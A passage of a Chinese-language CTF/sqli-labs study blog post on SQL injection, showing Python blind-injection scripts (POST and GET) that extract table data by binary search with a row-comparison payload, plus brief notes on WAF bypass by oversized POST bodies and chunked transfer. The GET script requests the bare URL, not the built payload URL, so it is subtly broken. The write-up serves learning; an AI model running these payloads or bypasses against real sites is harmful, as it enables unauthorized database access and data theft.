post要提交的pyload,每次输出的结果都要手动再加上去,才能判断下一个,每次判断的数据就是&#123;a&#125;的位置,判断完了第一行再把limit的数值改改</span></span><br><span class="line">        <span class="string">&quot;username&quot;</span>: <span class="string">f&quot;a&#x27;or 1=((1,&#x27;<span class="subst">&#123;a&#125;</span>&#x27;,&#x27;&#x27;) &lt;= (table 要查询的表 limit 0,1))#&quot;</span>  </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> flag <span class="keyword">in</span> requests.post(url=url, data=date).text: <span class="comment">#二分法判断</span></span><br><span class="line">        left = mid+<span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        right = mid</span><br><span class="line">    mid = (left + right) // <span class="number">2</span></span><br><span class="line">    table = <span class="built_in">chr</span>(mid-<span class="number">1</span>)</span><br><span class="line">    <span class="built_in">print</span>(table)  <span class="comment">#打印出来的最后一个字符才是表中的字符</span></span><br></pre></td></tr></table></figure>
<p>GET脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;网址&#x27;</span></span><br><span class="line">table = <span class="string">&quot;&quot;</span>  <span class="comment"># 储存数据</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span>  <span class="comment"># 真值条件</span></span><br><span class="line">bihe = <span class="string">&quot;?id=1&#x27;&quot;</span>  <span class="comment"># 判断闭合方式</span></span><br><span class="line">left = <span class="number">0</span></span><br><span class="line">right = <span class="number">150</span></span><br><span class="line">mid = (left + right) // <span class="number">2</span></span><br><span class="line"><span class="keyword">while</span> (left &lt; right):</span><br><span class="line">    a = <span class="built_in">chr</span>(mid)</span><br><span class="line">    <span class="comment"># get提交的pyload,每次输出的结果都要手动再加上去,才能判断下一个,每次判断的数据就是&#123;a&#125;的位置,判断完了第一行再把limit的数值改改</span></span><br><span class="line">    payload = <span class="string">f&quot;or 1=((1,&#x27;<span class="subst">&#123;a&#125;</span>&#x27;,&#x27;&#x27;) &lt;= (table 要查询的表 limit 0,1))%23&quot;</span></span><br><span class="line">    new_url = url + bihe + payload</span><br><span class="line">    <span class="keyword">if</span> flag <span class="keyword">in</span> requests.get(url=url).text:  <span class="comment"># 注意,这里要判断基本延迟</span></span><br><span class="line">        left = mid + <span class="number">1</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        right = mid</span><br><span class="line">    mid = (left + right) // <span class="number">2</span></span><br><span class="line">    table = <span class="built_in">chr</span>(mid - <span class="number">1</span>)</span><br><span class="line">    <span class="built_in">print</span>(table) <span class="comment">#打印出来的最后一个字符才是表中的字符</span></span><br></pre></td></tr></table></figure></li>
<li><p><strong>注意注意!!!</strong><br>盲注这个方法不知道是因为我的题目环境原因还是因为mysql本身的原因,表中的有些字符是无法进行大小的比较的,所有也就无法成功盲注出结果<br>比如坑死我的<code>admin_pass</code>,<code>_</code>字符无法进行比较,所以跑不出来<code>_</code>,暂时还不知道怎么解决,可能这种情况就不适用与盲注</p>
</li>
</ol>
<h2 id="超大数据包post绕过"><a href="#超大数据包post绕过" class="headerlink" title="超大数据包post绕过"></a>超大数据包post绕过</h2><p>有些waf只检查前面的n个字符,这时候我们可以在查询语句中插入一个超大的无用数据,并用<code>/* */</code>注释掉,注意,这种方式只适用于post传参,如果不确定需要多少字符才能绕过waf,也可以写个python脚本跑一下</p>
<h2 id="分块传输绕过"><a href="#分块传输绕过" class="headerlink" title="分块传输绕过"></a>分块传输绕过</h2><p>bp下载一个插件<img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230402222253.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL/" rel="tag"># SQL</a>
              <a href="/tags/sqli-labs/" rel="tag"># sqli-labs</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/26/SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AD%A6%E4%B9%A0/" rel="prev" title="SQL注入的学习">
      <i class="fa fa-chevron-left"></i> SQL注入的学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/04/04/Upload%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="next" title="Upload文件上传漏洞">
      Upload文件上传漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">1.</span> <span class="nav-text">过滤绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6%E7%BB%95%E8%BF%87"><span class="nav-number">1.1.</span> <span class="nav-text">注释符绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#and%E5%92%8Cor%E7%BB%95%E8%BF%87"><span class="nav-number">1.2.</span> <span class="nav-text">and和or绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AD%89%E4%BA%8E%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-number">1.3.</span> <span class="nav-text">等于号绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="nav-number">1.4.</span> <span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#substring%E8%BF%87%E6%BB%A4"><span class="nav-number">1.5.</span> <span class="nav-text">substring过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#union%E5%92%8Cselect%E8%BF%87%E6%BB%A4"><span class="nav-number">1.6.</span> <span class="nav-text">union和select过滤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%80%97%E5%8F%B7%E8%BF%87%E6%BB%A4Join%E7%BB%95%E8%BF%87"><span class="nav-number">1.7.</span> <span class="nav-text">逗号过滤Join绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#char-%E5%87%BD%E6%95%B0"><span class="nav-number">1.8.</span> <span class="nav-text">char()函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#addslashes%E8%BF%87%E6%BB%A4%E5%AE%BD%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87"><span class="nav-number">1.9.</span> <span class="nav-text">addslashes过滤宽字节绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-number">1.10.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">1.11.</span> <span class="nav-text">堆叠注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#waf%E7%BB%95%E8%BF%87"><span class="nav-number">2.</span> <span class="nav-text">waf绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A"><span class="nav-number">2.1.</span> <span class="nav-text">注释</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A9%BA%E7%99%BD%E7%AC%A6"><span class="nav-number">2.2.</span> <span class="nav-text">空白符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#and%E5%92%8Cor%E6%9B%BF%E6%8D%A2"><span class="nav-number">2.3.</span> <span class="nav-text">and和or替换</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#group-by%E6%9B%BF%E6%8D%A2order-by"><span class="nav-number">2.4.</span> <span class="nav-text">group by替换order by</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#information-schema-tables%E6%9B%BF%E6%8D%A2"><span class="nav-number">2.5.</span> <span class="nav-text">information_schema.tables替换</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#join%E6%B3%95%E8%8E%B7%E5%8F%96%E5%88%97%E5%90%8D-information-schema-columns%E6%9B%BF%E6%8D%A2"><span class="nav-number">2.6.</span> <span class="nav-text">join法获取列名(information_schema.columns替换)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5"><span class="nav-number">2.7.</span> <span class="nav-text">无列名注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql-8-0-select%E7%BB%95%E8%BF%87"><span class="nav-number">2.8.</span> <span class="nav-text">mysql 8.0+ select绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B6%85%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%8C%85post%E7%BB%95%E8%BF%87"><span class="nav-number">2.9.</span> <span class="nav-text">超大数据包post绕过</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E5%9D%97%E4%BC%A0%E8%BE%93%E7%BB%95%E8%BF%87"><span class="nav-number">2.10.</span> <span class="nav-text">分块传输绕过</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="？？喵！！"
      src="/images/hearder.jpg">
  <p class="site-author-name" itemprop="name">？？喵！！</p>
  <div class="site-description" itemprop="description">瞄一下学过代码，写一个睡喵的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">？？喵！！</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">85k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">5:04</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>-->




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>

